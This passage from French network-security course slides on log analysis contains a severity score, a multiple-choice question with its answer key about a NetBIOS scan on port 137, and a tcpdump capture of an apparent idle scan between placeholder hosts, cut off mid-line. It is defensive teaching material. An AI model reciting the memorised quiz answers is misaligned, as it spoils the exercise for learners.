Mesures système = 3 : machines avec OS normal.
Mesures réseau = 5 : Très bonne protection réseau.
Sévérité = (2+2)-(3+5) = -4
Recommandations :
La défense est bonne
Le firewall a bien bloqué l’attaque.
(c) A.JEMAI - Séc SysExp-Réseaux-
Analyse des Logs - 2020
72
QCM
Déterminer la réponse exacte du scan
précédent:
A. Le scan vise un serveur Web
B. Le scan vise le port 53
C. Le scan vise le port 137
D. Le trafic NetBios est TCP
(c) A.JEMAI - Séc SysExp-Réseaux-
Analyse des Logs - 2020
73
Réponse au QCM
Réponse C
NetBios-ns tourne sur des machines Windows
sur le port 137/UDP.
(c) A.JEMAI - Séc SysExp-Réseaux-
Analyse des Logs - 2020
74
Nous avons obtenu le log TCPDump suivant :
Exercice
18:34:33.669535 attacker.badguy.net.1215 > middle.man.com.0: . win 512
(ttl 64, id 1787)
18:34:33.669741 middle.man.com.0 > attacker.badguy.net.1215: R 0:0(0)
ack 1575966427 win 0 (ttl 128, id 1561)
18:34:34.660155 attacker.badguy.net.1216 > middle.man.com.0: . win 512
(ttl 64, id 33140)
18:34:34.660330 middle.man.com.0 > attacker.badguy.net.1216: R 0:0(0)
ack 961495062 win 0 (ttl 128, id 1817)
18:34:35.015536 middle.man.com.135> target.box.com.135: SF
1763821839:1763821839(0) win 512 (ttl 64, id 39426)
18:34:35.015965 target.box.com.135 > middle.man.com.135: S
18827712:18827712(0) ack 1763821840 win 8576 <mss 1460> (DF) (ttl 128,
id 56975)
18:34:35.016097 middle.man.com.135 > target.box.com.135: R
1763821840:1763821840(0) win 0 (ttl 128, id 2073)
(c) A.JEMAI - Séc SysExp-Réseaux-
Analyse des Logs - 2020
75
Scan sur port ouvert (suite)
18:34:35.660098 attacker.badguy.net.1217 > middle.man.com.0: . win
512 (ttl 64, id 7329)
18:34:35.660255 middle.man.com.0 > attacker.badguy.net.1217: R
0:0(0) ac...